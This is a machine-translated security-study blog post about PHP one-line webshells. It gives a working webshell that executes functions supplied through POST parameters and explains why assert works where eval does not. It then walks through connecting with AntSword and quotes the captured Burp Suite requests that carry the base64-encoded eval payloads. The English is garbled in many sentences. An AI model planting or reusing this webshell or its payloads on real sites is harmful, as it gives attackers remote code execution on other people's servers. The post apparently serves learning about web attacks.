Security foundation 6 - vulnerability recurrence

Tools ： Ant sword 、burpsuite

In a word, Trojans ：

<?php
$_POST['1']($_POST['2']);

1、 Start ： We want to POST Medium 1 Transmission ：eval, So this becomes eval($_POST['2]), At this time, it becomes a perfect one sentence Trojan horse .

however ： The connection fails in this way

  Reasons for failure ：eval It's a language construct, not a function , Cannot be called by a mutable function

PHP Support the concept of variable function , If a variable name is followed by parentheses ,PHP Will look for a function with the same name as the value of the variable , And try to execute it . Variable functions can be used to implement, including callback functions , Some uses, including function tables .

2、 At this time , We try to use assert Function test

  But it still hasn't been achieved

3、 Then we will 1 Submitted as assert,2 Submitted as eval($_POST[2]) To test , Submitting parameters in this way is equivalent to PHP The code in becomes assert（eval($_POST[2])）

Finally, the connection is successful , It shows that this method is feasible  

The reason for success ：assert stay php Is considered a function

4、 If we 1 Submitted as assert,2 Submitted as $_POST['chengke'],post Inside is any string , Can it be successful , We succeed again

  for the first time , The connection password we set is chengke, The connection fails

   The second time , We changed the password to 2 when , Show successful connection

  At this time, we grab bags and test

First step ： We first in burpsuite And ant sword

  The second step ： Use ant sword to initiate connection request for packet capture

  The information you can get by capturing packets starts with ：1=assert&2=%40eval(%40base64_decode(%24_POST%5B'v723948492fd3c'%5D))%3B&v723948492fd3c=Q.......

Can see 2 There is one more inside eval function , Because we use base64 code , So it uses eval Function pair base64 Provide decoding operation

If we don't use encoder , The result of the test is ：

We can see the information obtained without using the encoder 2 There is no eval function , Just a string , However, only strings cannot be executed assert function , So you can't use encoder .1=assert&2=%24_POST%5B'chengke'%5D&chengke=%40ini_set(%22display_........

Thus we can see that , When we choose base64 Encoder encoding , It will generate automatically eval Function pair base64 decode , However, we just need to 2 There is eval function , You can use assert So as to generate a sentence Trojan .